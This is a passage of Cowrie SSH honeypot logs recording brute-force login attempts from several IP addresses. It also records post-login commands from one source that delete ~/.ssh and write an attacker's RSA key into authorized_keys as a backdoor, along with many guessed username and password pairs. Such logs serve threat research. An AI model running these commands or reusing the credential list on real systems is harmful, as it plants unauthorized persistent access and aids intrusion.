es192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:58.007008Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.login.success","username":"root","password":"!!qq@@ww","message":"login attempt [root/!!qq@@ww] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:52:58.511046Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:58.761282Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:52:58.762213Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:52:58.763055Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:58.881164Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:52:59.232852Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.233575Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.404530Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.405384Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59593,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa72bd91b421","protocol":"ssh","message":"New connection: 212.227.235.229:59593 (1.2.3.4:22) [session: fa72bd91b421]","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.518200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.519122Z","src_ip":"212.227.235.229","session":"fa72bd91b421"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":41724,"dst_ip":"1.2.3.4","dst_port":22,"session":"22d560c876bd","protocol":"ssh","message":"New connection: 157.20.207.165:41724 (1.2.3.4:22) [session: 22d560c876bd]","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.606026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.606997Z","src_ip":"157.20.207.165","session":"22d560c876bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.650504Z","src_ip":"212.227.235.229","session":"fa72bd91b421"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:52:59.789951Z","src_ip":"157.20.207.165","session":"22d560c876bd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:53:00.154142Z","src_ip":"212.227.235.229","session":"fa72bd91b421"}
{"eventid":"cowrie.login.failed","username":"portal","password":"0","message":"login attempt [portal/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:53:00.565082Z","src_ip":"157.20.207.165","session":"22d560c876bd"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:53:01.275579Z","src_ip":"212.227.235.229","session":"fa72bd91b421"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62791,"dst_ip":"1.2.3.4","dst_port":22,"session":"503e30bbf984","protocol":"ssh","message":"New connection: 212.227.235.229:62791 (1.2.3.4:22) [session: 503e30bbf984]","sensor":"my-vps","timestamp":"2025-09-09T06:53:01.389301Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:53:01.390053Z","src_ip":"212.227.235.229","session":"503e30bbf984"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:53:01.506726Z","src_ip":"212.227.235.229","session":"503e30bbf984"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:53:01.750801Z","src_ip":"157.20.207.165","session":"22d560c876bd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:53:02.005977Z","src_ip":"212.227.235.229","session":"503e30bbf984"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:53:02.122894Z","src_ip":"212.227.235.229","session":"503e30bbf984"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:53:02.123884Z","src_ip":"212.227.235.229","session":"20aa3a017bcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45629,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b53b6516514","protocol":"ssh","message":"New connection: 212.227.235.229:45629 (1.2.3.4:22) [session: 9b53b6516514]","sensor":"my-vps","timestamp":"2025-09-09T06:53:28.971094Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:53:28.972358Z","src_ip":"212.227.235.229","session":"9b53b6516514"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:53:29.215096Z","src_ip":"212.227.235.229","session":"9b53b6516514"}
{"eventid":"cowrie.login.failed","username":"dbadmin","password":"0","message":"login attempt [dbadmin/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:53:30.227864Z","src_ip":"212.227.235.229","session":"9b53b6516514"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":56984,"dst_ip":"1.2.3.4","dst_port":22,"session":"95e966105712","protocol":"ssh","message":"New connection: 118.26.39.178:56984 (1.2.3.4:22) [session: 95e966105712]","sensor":"my-vps","timestamp":"2025-09-09T06:53:30.575945Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:53:30.578566Z","src_ip":"118.26.39.178","session":"95e966105712"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:53:30.834454Z","src_ip":"118.26.39.178","session":"95e966105712"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:53:31.471928Z","src_ip":"212.227.235.229","session":"9b53b6516514"}
{"eventid":"cowrie.login.failed","username":"tcpdump","password":"tcpdump1234","message":"login attempt [tcpdump/tcpdump1234] failed","sensor":"my-vps","timestamp":"2025-09-09T06:53:31.861871Z","src_ip":"118.26.39.178","session":"95e966105712"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:53:33.123682Z","src_ip":"118.26.39.178","session":"95e966105712"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51343,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8dec1e2f9af","protocol":"ssh","message":"New connection: 212.227.235.229:51343 (1.2.3.4:22) [session: b8dec1e2f9af]","sensor":"my-vps","timestamp":"2025-09-09T06:54:03.914354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:03.915699Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:04.032800Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.login.success","username":"root","password":"123mysql","message":"login attempt [root/123mysql] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:54:04.540520Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:54:04.841854Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:54:04.842628Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:54:04.843637Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:04.961510Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:54:05.209006Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:54:05.209872Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:54:05.329274Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:05.330198Z","src_ip":"212.227.235.229","session":"b8dec1e2f9af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59739,"dst_ip":"1.2.3.4","dst_port":22,"session":"4587541ed973","protocol":"ssh","message":"New connection: 212.227.235.229:59739 (1.2.3.4:22) [session: 4587541ed973]","sensor":"my-vps","timestamp":"2025-09-09T06:54:05.442036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:54:05.450079Z","src_ip":"212.227.235.229","session":"4587541ed973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:54:05.564173Z","src_ip":"212.227.235.229","session":"4587541ed973"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:54:06.024215Z","src_ip":"212.227.235.229","session":"4587541ed973"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:54:07.142128Z","src_ip":"212.227.235.229","session":"4587541ed973"}
